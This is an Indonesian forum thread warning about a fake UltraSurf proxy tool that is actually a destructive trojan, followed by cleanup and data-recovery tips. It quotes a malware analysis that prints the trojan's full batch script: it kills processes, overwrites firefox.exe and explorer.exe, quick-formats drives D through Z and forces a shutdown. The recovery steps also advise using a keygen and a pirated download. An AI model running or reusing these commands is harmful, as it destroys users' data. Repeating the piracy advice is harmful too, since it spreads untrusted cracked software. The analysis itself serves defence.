maap agan semua, buat agan yang data na hilang, silahkan agan ke warnet dulu ato beli vocher three, turs agan donlot Wondershare Data Recovery Full di googlin aja ga, trus habis install, kan nongol tuh jendela wizardna, piih jenis data yaang dikembalikan, pilih ja yang pling bawah, trus pilih directory na, trus checklist enable deep scan, emang agak lama, n work data agan akan kembali excellent
regard

melanjutka thread ini saya akan membahas cara menghentikan virus ini

Assalamu Alaikum

Apa ada yang pernah kena Virus ini



Ini sangat Kesal Karena Telah meresahkan pengguna internet, ia bermoduskan bypass internet Gratis AON. Tapi apa di dalam salah satu program mengandung Virus Ultrasurf yang sangat berbahaya.

Kenapa saya bilang virus ini Sangat berbahaya karena :
1. virus ini bisa memformat Hardisk Semua Kecual C:
2. Virus ini membuat semua program yang di install gak bisa kebuka dan jadi Shorcut

Menurut Virus Indonesia ini Penjelasan tentang Virus ini.
Ane kutip aja langsung dari Thread ini :
http://www.kaskus.co.id/showthread.php?t=16549849

Ini dia :

Sumber : http://virusindonesia.com/2011/08/16...mua-hard-disk/

Ultrasurf : memformat semua hard disk



UltraSurf. Beberapa waktu yang lalu, di forum virusindonesia.com ada salah seorang user yang sengaja mempublikasikan salah satu aplikasi dengan nama UltraSurf. Dengan mengatakan bahwa aplikasi UltraSurf ini dapat mem-bypass proxy dan membuat user bisa mengakses setiap website yang di blok. Sekilas aplikasi ini memang mirip aplikasi UltraSurf yang sebenarnya, tetapi hal buruklah yang akan user alami jika menggunakan aplikasi tipuan ini karena sudah dipastikan user akan kehilangan seluruh data di hard disknya.

A. Info File
Nama Worm : UltraSurf
Asal : Indonesia
Ukuran File : Random
Packer : UPX 0.89 – 3.xx -> Markus & Laszlo ver. [ 3.07 ]
Pemrograman : Delphi
Icon : Random
Tipe : Trojan, Worm

B. About Malware

Variant pertama dari UltraSurf kami dapatkan berasala dari Jakarta. Mungkin hanya buatan orang yang memang berniat untuk menghapus setiap data user yang terdapat pada drive lain selain drive C. Hal ini dimaksudkan agar malware tetap bisa menjalankan aksinya untuk memformat setiap drive setelah di jalankan.

Seperti yang terlihat pada gambar di atas, UltraSurf berasal dari Indonesia. Setelah di UnPack, sangat terlihat tujuan dari UltraSurf setelah dijalankan oleh user.


C. Companion/File yang dibuat

Setelah user menjalankan UltraSurf, malware ini akan membuat 1 buah file dengan nama ultrasurf.bat di folder temporary. Pada variant D, file bat yang dibuat menggunakan nama “alaskan ip.bat”. Batch file ini hanya bersifat sementara yang dibuat setelah UltraSurf di jalankan dan otomatis dihapus setelah selesai mengeksekusi seluruh perintahnya.

D. Hasil Infeksi
Dengan perintah-perintah bat file ini, jelas benar-benar terlihat apa saja yang akan dilakukan oleh UltraSurf.
Menghentikan proses dengan nama idman.exe, firefox.exe, explorer.exe

taskkill /f /im idman.exe
taskkill /f /im firefox.exe
taskkill /f /im explorer.exe

mengcopy file hostnya dan melakukan overwrite ke beberapa file seperti IDMan.exe, firefox.exe, explorer, explorer.exe

xcopy ultrasurf.exe /h /r /c /y "C:\Program Files\Internet Download Manager\IDMan.exe"
xcopy ultrasurf.exe /h /r /c /y "C:\Program Files\Mozilla Firefox\firefox.exe"
xcopy ultrasurf.exe /h /r /c /y "C:\windows\explorer"
xcopy ultrasurf.exe /h /r /c /y "C:\windows\explorer.exe"

Memformat semua hard disk mulai dari drive D sampai Z.

echo.
Format D: /Q /X /y
echo.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
Format G: /Q /X /y
echo.
Format H: /Q /X /y
echo.
Format I: /Q /X /y
echo.
Format J: /Q /X /y
echo.
Format K: /Q /X /y
echo.
Format L: /Q /X /y
echo.
Format M: /Q /X /y
echo.
Format N: /Q /X /y
echo.
Format 0: /Q /X /y
echo.
Format P: /Q /X /y
echo.
Format Q: /Q /X /y
echo.
Format R: /Q /X /y
echo.
Format S: /Q /X /y
echo.
Format T: /Q /X /y
echo.
Format U: /Q /X /y
echo.
Format V: /Q /X /y
echo.
Format W: /Q /X /y
echo.
Format X: /Q /X /y
echo.
Format Y: /Q /X /y
echo.
Format Z: /Q /X /y

Dan yang terakhir adalah melakukan proses shuting down

start shutdown.exe -f -t 0 –s

Meskipun tidak membuat host untuk dijadikan startup, UltraSurf memanfaatkan user yang tidak tidak tahu bahwa file firefox.exe sudah di hapus dan digantikan dengan host UltraSurf. Selain itu IDMan.exe adalah salah satu file dari software Internet Download Manager yang di jalankan saat startup, jadi UltraSurf yang sudah mengganti file IDMan.exe dengan host buatannya akan berjalan saat startup.

E. Pembersihan


PCMAV 5.4 Update Build1

Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.4 Update Build1 telah hadir dengan penambahan 29 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.4, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.

Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.

Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:

SendSpace.com (sorry gan link nya mati )

ZippyShare.com (mirror) (sorry gan link nya mati )

rapid*share.com (mirror) (sorry gan link nya mati )

Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.

Daftar tambahan virus hingga PCMAV 5.4 Update Build1:

Fandi.vbs.C
Fandi.vbs.C.inf
NgrBot
NgrBot.bat
NgrBot.dat
NgrBot.drp.A
NgrBot.drp.B
NgrBot.exe.A
NgrBot.exe.B
NgrBot.inf
NgrBot.lnk
Pluto.C
Pluto.C.drp
Pluto.C.htm
Redlof.vbs.B
Redlof.vbs.B.drp
Redlof.vbs.B.inf
RezaTera.B
RezaTera.B.drp
RezaTera.B.url
Rieysha-Jogja.E
Rieysha-Jogja.E.hosts
Rieysha-Jogja.E.vbs
UltraSurf.A
UltraSurf.A.bat
UltraSurf.B
UltraSurf.C
UltraSurf.D
UltraSurf.D.bat

Untuk Mengatasi itu diatas udah ada Caranya.

Tapi ane punya cara sendiri yang lebih ampuh dan mudah.
1. Download Smadav Antivirus di http://smadav.net
2. Scan Computermu dengan Mode Full Scan
3. Setelah Scan Selesai restart Computer mu.

Tapi setelah di restart data tetap hilang .
Ingat saat pertama terserang jangan taruh data anda di hardisk yang terformat. Karena jika ini terjadi kemungkinan data anda tidak akan bisa lag kembali

Kemudian Download Software untuk mengembalikan Data yang Hilang.
Software yang paling mudah dan hasilnya 90% data kembali adalah Wondershare Data Recovery Full <- Ini udah gw test. Hasilnya bgus bisa juga pakai Get Data Back. COba Search di Google

Cara pakai software Wondershare Data Recovery Gampang

1. Download dulu Softwarenya
2. Install dan pake keygen supaya full Softwarenya
3. Buka klik next
4. Pilih All Files dan Klik Next
5. Di Spesific Location Pilih Drive yang ingin dikembalikan datanya
6. Centang Deep Scan dan next
7. Tunggu
8. Setalah muncul semua centang semua data, pilih lokasi drive yang ingin disimpan data yang hilang . Ingat jika anda menscan Drive E maka tempat yang anda pilih untuk mengembalikan data jagan drive E juga pilih drive yang lain seperti Drive C:klik recovery
9. Pekerjaan paling membosankan adalah menunggu
10. Setelah itu Selesai deh

Untuk referensi Software :
[url]http://www.media*fire..com/?lclx2nkd9vtgmqx[/url]
pssword : neodatarecover
Ntr pilih complete recovery..katax sih 90-99% recovery

dan

EASEUS Data Recovery Wizard Pro v5.5.1

Terima Kasih

Sebagai tanda terima kasih tolong

regards
Info menarik lainnya di :

http://skylandhacker.net